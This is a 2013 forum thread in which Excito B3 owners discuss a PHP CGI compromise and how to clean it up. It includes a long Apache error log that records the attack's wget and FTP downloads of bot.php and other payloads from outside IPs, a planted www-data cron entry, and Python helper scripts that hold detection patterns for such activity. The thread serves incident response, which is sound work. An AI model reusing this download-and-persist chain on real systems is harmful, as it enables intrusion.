
Re: I have been attacked and don't know why.

Posted: 02 Nov 2013, 18:56
by Binkem
Hi,

I'm finding the
<b>Security Alert!</b> The PHP CGI cannot be accessed directly.
lines in my error.log. I cannot find any cronjobs on my B3 (typing crontab -e as www-data, root and myself).

Does this mean that I'm not (yet) infected? Or am I looking in the wrong place?

Martijn

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 03:30
by Ubi
They got me as well... I found an entry to stablehost.us in the crontab for www-data
and two hidden files in /dev/shm/ that contained the malware payload.

:(

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 04:16
by Ubi
So why exactly does www-data have a valid shell on the B3?

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 04:18
by RandomUsername
I was wondering the same thing myself. I checked my /dev/shm and there are no hidden files there.

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 07:43
by toukie
Same stuff in logs here plus this in crontab www-data:
* * * * * /tmp/.UNIX/update >/dev/null 2>&1

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 07:51
by Ubi
So I guess it's safe to say there are multiple attacks that use the same point of entry, but have a slightly different payload.

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 08:31
by RandomUsername
Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 09:19
by Gordon
RandomUsername wrote: Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.
Not likely. I see similar attempts on my B3 and I can state for a fact that they are not using the myownb3 host names.

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 09:27
by toukie
What is the fix for this?

I have ". .. network" in /dev/shm. What does that say?

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 10:10
by Puma
hello,

Under attack as well.

How can I check the cron job for www-data?

In my error log I found:

[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: c:windowssystem32cmd.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] %TEMP%x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: bitsadmin: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ftp: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: del: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/lol
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- ftp://ftp:*password*@80.79.48.186/bot.php
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] => `bot.php'
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 80.79.48.186:21...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/c
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logging in as ftp ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logged in!
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ==> SYST ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] done. ==> PWD ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> TYPE I ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> CWD not needed.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> SIZE bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 15138
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> PASV ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> RETR bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] Length: 15138 (15K) (unauthoritative)
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 0K ..
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] . .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .. 100% 158K=0.09s
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:01 (158 KB/s) - `bot.php' saved [15138]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 6906 (6.7K) [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `lol'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K .
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 256 [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `c'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K 100% 8.55M=0s
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:04 (8.55 MB/s) - `c' saved [256/256]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:05-- http://74.52.9.186/a
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] ..
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] . 100% 3.33K=2.0s
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:06 (3.33 KB/s) - `lol' saved [6906/6906]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 1:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] \x7fELF\x01\x01\x01\x02\x03\x01\xb8%@44: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 2:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ,\xe3\x8a\x10^=^=^=\x14\x15\x02\xfb\xff\xff\xff#!/usr/bin/perl: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 5: Syntax error: "(" unexpected
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Length: 712 [text/plain]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Saving to: `a'
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 0K 100% 21.4M=0s
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:14 (21.4 MB/s) - `a' saved [712/712]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] no crontab for www-data
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:14-- http://74.52.9.186/update
[Sun Nov 03 14:43:24 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Length: 208 [text/plain]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Saving to: `update'
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 0K 100% 6.40M=0s
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:28 (6.40 MB/s) - `update' saved [208/208]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: No such file or directory while trying to stat bash
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on dmgshm
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Operation not supported while reading flags on ftdaemon
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-hdroogers
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-root
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on shallalist.tar
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:28-- http://74.52.9.186/clamav
[Sun Nov 03 14:43:30 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Length: 379680 (371K) [text/plain]
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Saving to: `clamav'
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:40 2013] [error] [client 37.187.77.137] 0K .......... .......... .......... .......... .......... 13% 8.69K 37s
[Sun Nov 03 14:43:45 2013] [error] [client 37.187.77.137] 50K .......... .......... .......... .......... .......... 26% 10.4K 29s
[Sun Nov 03 14:43:51 2013] [error] [client 37.187.77.137] 100K .......... .......... .......... .......... .......... 40% 8.04K 25s
[Sun Nov 03 14:43:57 2013] [error] [client 37.187.77.137] 150K .......... .......... .......... .......... .......... 53% 8.25K 19s
[Sun Nov 03 14:44:07 2013] [error] [client 37.187.77.137] 200K .......... .......... .......... .......... .......... 67% 5.24K 16s
[Sun Nov 03 14:44:20 2013] [error] [client 37.187.77.137] 250K .......... .......... .......... .......... .......... 80% 3.92K 11s
[Sun Nov 03 14:44:28 2013] [error] [client 37.187.77.137] 300K .......... .......... .......... .......... .......... 94% 5.38K 3s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 350K .......... .......... 100% 9.49K=57s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 2013-11-03 14:44:31 (6.55 KB/s) - `clamav' saved [379680/379680]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 19: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 20: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] ./bash: 1: Syntax error: "(" unexpected
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] chattr: Operation not permitted while setting flags on bash
[Sun Nov 03 14:48:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 14:48:01 2013] [error] [client 37.187.77.137] Script timed out before returning headers: php
[Sun Nov 03 14:53:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
I think this is not ok... FTP access was not enabled!!

What can I do best?

Puma
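The log excerpt above shows what a shell running under the web server's identity leaves behind in Apache's error.log: `sh: ... not found` lines, wget download banners, crontab and /etc/cron.hourly manipulation, and CGI timeouts, all from one client IP. The following is an added example, not code from this thread or from Excito, that parses lines in that format and counts such indicators per client; the sample lines are constructed in the shape of Puma's excerpt (client and download IPs copied from it, the 10.0.0.5 line invented as a benign control) and the indicator patterns are the author's own choice.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape of the Apache error.log excerpt quoted
# in the thread; the last line is an invented, benign control entry.
SAMPLE_LOG = """\
[Sat Nov 02 18:00:00 2013] [error] [client 37.187.77.137] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/lol
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] no crontab for www-data
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Sun Nov 03 14:48:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 14:50:00 2013] [error] [client 10.0.0.5] File does not exist: /var/www/favicon.ico
"""

# Apache 2.2 error.log layout: [timestamp] [level] [client IP] message
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]]+)\] ?(?P<msg>.*)$")

# None of these belong in a web server's error log unless a shell or a
# downloader ran under the web server's identity (assumed indicator set).
INDICATORS = {
    "php_cgi_direct": re.compile(r"PHP CGI cannot be accessed directly"),
    "shell_error":    re.compile(r"^sh: "),
    "download":       re.compile(r"^--\d{4}-\d\d-\d\d .*-- (?:https?|ftp)://"),
    "crontab":        re.compile(r"crontab|/etc/cron\."),
    "cgi_timeout":    re.compile(r"Timeout waiting for output from CGI script"),
}

def parse_line(line):
    """Split one error.log line into its fields, or None if it does not match the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def summarize(log_text):
    """Return {client_ip: {indicator_name: count}} over all lines that hit an indicator."""
    hits = defaultdict(lambda: defaultdict(int))
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for name, pat in INDICATORS.items():
            if pat.search(rec["msg"]):
                hits[rec["ip"]][name] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}

def suspicious_clients(log_text, min_kinds=2):
    """Client IPs that triggered at least min_kinds distinct indicator types."""
    return sorted(ip for ip, counts in summarize(log_text).items() if len(counts) >= min_kinds)
```

Run it over a real error.log with `summarize(open("/var/log/apache2/error.log").read())`; a single `sh:` line can be noise, but several indicator types from one client within minutes is the pattern shown in the thread.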

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 10:12
by DanielM
RandomUsername wrote: Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.
Nope. I have my own .se domain, I've never used myownb3.com.

I'm in Sweden, on dynamic IP (I've had the same IP for some years now though). The IP is 88.206.x.x, I doubt that anyone else here is in the same range.

I'm out of guesses now, but it sure doesn't feel like coincidence...

/Daniel

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 10:14
by DanielM
Puma wrote: How can I check the cron job for www-data?
You can (logged in as root) do either "crontab -u www-data -l" to list all cron jobs for www-data or "crontab -u www-data -e" to open up an editor (I think you'll get nano) for the jobs. Just delete the rows that shouldn't be there and save with ctrl-x. You might want to take a copy of the rows first so that you can check what they did.

/Daniel
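Daniel's `crontab -u www-data -l` check can be automated so that entries like the `/tmp/.UNIX/update` one quoted in this thread are flagged rather than read by eye. This is an added example, not code from the thread or from Excito: `audit_crontab` applies a few heuristics of the author's choosing (scratch directories, hidden path components, runtime downloads, every-minute schedules) to crontab text, and `audit_user` feeds it the output of `crontab -u USER -l`, which needs root. The sample crontab is constructed; only its last line is taken from the thread.

```python
import re
import subprocess

# Constructed sample in the shape of `crontab -u www-data -l` output. The
# first job is an invented, legitimate-looking entry; the last one is the
# entry quoted by toukie and Puma in this thread.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
17 *    * * *   /usr/bin/php /var/www/cron.php >/dev/null 2>&1
* * * * * /tmp/.UNIX/update >/dev/null 2>&1
"""

# Heuristics (assumed, not exhaustive): each is a reason to look at an entry.
SUSPECT_PATTERNS = [
    (re.compile(r"/(?:tmp|var/tmp|dev/shm)/"), "runs from a world-writable scratch directory"),
    (re.compile(r"/\.[^/\s]+"), "references a hidden (dot) path component"),
    (re.compile(r"\b(?:wget|curl|ftp)\b"), "downloads something at run time"),
    (re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s"), "runs every minute"),
]

def audit_crontab(text):
    """Return [(entry, [reasons])] for every non-comment line matching a suspect pattern."""
    findings = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = [why for pat, why in SUSPECT_PATTERNS if pat.search(entry)]
        if reasons:
            findings.append((entry, reasons))
    return findings

def audit_user(user):
    """Audit the live crontab of `user` (run as root); a missing crontab yields []."""
    proc = subprocess.run(["crontab", "-u", user, "-l"], capture_output=True, text=True)
    if proc.returncode != 0:   # e.g. "no crontab for www-data"
        return []
    return audit_crontab(proc.stdout)

if __name__ == "__main__":
    for entry, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(entry, "->", "; ".join(reasons))
```

Before deleting a flagged entry, copy it and the file it points to (here `/tmp/.UNIX/update`) somewhere safe, as Daniel suggests, so the payload can still be examined later.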

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 10:32
by Puma
Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

Seems we all are attacked!

Puma

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 10:56
by Gordon
Puma wrote: Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

Seems we all are attacked!

Puma
That sounds a bit like jumping to conclusions to me. Also, on my B3 I do not have the exact same log entries as quoted here, but that may be the result of my webserver not responding correctly for this exploit (I do not have Apache running on the exposed B3, but Nginx).
However, if all of you can match times at which the attacks occurred, that could point to someone being able to access the logs of either this forum or the Excito update site.

Re: I have been attacked and don't know why.

Posted: 03 Nov 2013, 11:49
by Puma
You're probably right,

My father's B2 was not attacked (vs 2.6, uses update but not forum)
My brother-in-law's B3 was not attacked (vs 2.5, without forum)

Can Excito check the access to the logs?

Are there countermeasures which we can take other than deleting www-data cron jobs and/or tmp/entries?

Puma